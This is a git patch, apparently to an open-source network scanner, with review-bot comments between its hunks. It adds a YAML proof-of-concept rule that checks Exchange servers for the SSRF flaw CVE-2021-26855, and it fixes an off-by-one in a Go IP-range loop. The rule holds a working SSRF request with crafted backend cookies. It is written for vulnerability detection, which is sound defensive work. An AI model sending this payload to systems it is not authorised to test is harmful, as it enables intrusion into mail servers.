From f4b6ecc36316a49014d380be6423ae9a090be9f9 Mon Sep 17 00:00:00 2001
From: shadow1ng
Date: Wed, 31 Mar 2021 17:03:33 +0800
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0exchange=5Fssrf=5Fpoc?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 WebScan/pocs/exchange-cve-2021-26855-ssrf.yml | 14 ++++++++++++++
 common/ParseIP.go | 2 +-
 2 files changed, 15 insertions(+), 1 deletion(-)
 create mode 100644 WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
diff --git a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
new file mode 100644
index 0000000..6b80262
--- /dev/null
+++ b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
@@ -0,0 +1,14 @@
+name: poc-yaml-exchange-cve-2021-26855-ssrf
+rules:
+ - method: GET
+ path: /owa/auth/x.js
+ headers:
+ Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
+ follow_redirects: false
+ expression: |
+ response.headers["X-CalculatedBETarget"].icontains("localhost")
+detail:
+ author: sharecast
+ Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
+ links:
+ - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse
\ No newline at end of file
diff --git a/common/ParseIP.go b/common/ParseIP.go
index 4716ed2..5ae5649 100644
--- a/common/ParseIP.go
+++ b/common/ParseIP.go
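Review bot: The `detail` block of the new rule file mixes key styles: `author` and `links` are lowercase single-word keys while `Affected Version` is a capitalized key containing a space, so any consumer that looks up a fixed key name will not find it; `affected_version: "Exchange 2013 Versions < 15.00.1497.012, …"` (or whatever key the other files under WebScan/pocs use) would keep the POC files uniform. The file also ends without a trailing newline, as the `\ No newline at end of file` marker in this hunk shows. The match expression indexes `response.headers["X-CalculatedBETarget"]` directly; whether a response that lacks that header evaluates to a non-match or aborts rule evaluation depends on the expression engine, which this hunk does not show, so that behaviour is worth confirming in the engine's documentation so an absent header is reported as "not affected" rather than as an evaluation error.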
@@ -131,7 +131,7 @@ func ParseIPC(ip string) ([]string, error) {
 }
 startNum := start[0]<<24 | start[1]<<16 | start[2]<<8 | start[3]
 endNum := end[0]<<24 | end[1]<<16 | end[2]<<8 | end[3]
- for num := startNum; num < endNum; num++ {
+ for num := startNum; num <= endNum; num++ {
 ip := strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff)
 AllIP = append(AllIP, ip)
 }
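Review bot: The inclusive bound `num <= endNum` is the right fix for a start–end address range, but the hunk still has no check that `startNum <= endNum`, so a reversed range (end before start) silently yields an empty result instead of an error; a guard such as `if startNum > endNum { return nil, errors.New("ip range end is before start") }` before the loop would make that explicit (use whichever error helper the file already imports). The type of `num` comes from `start`/`end`, which are declared outside the hunk; if they are narrower than `int` (for example a uint32 packing), a range ending at 255.255.255.255 can never fail the `<=` test after `num++` wraps, so it is worth confirming the type is wide enough for the inclusive bound. The body's `ip :=` also shadows the `ip string` parameter visible in the hunk header, which is legal but easy to misread; `addr := strconv.Itoa(...)` with `AllIP = append(AllIP, addr)` would remove the shadowing. ParseIPC starts and ends outside this hunk.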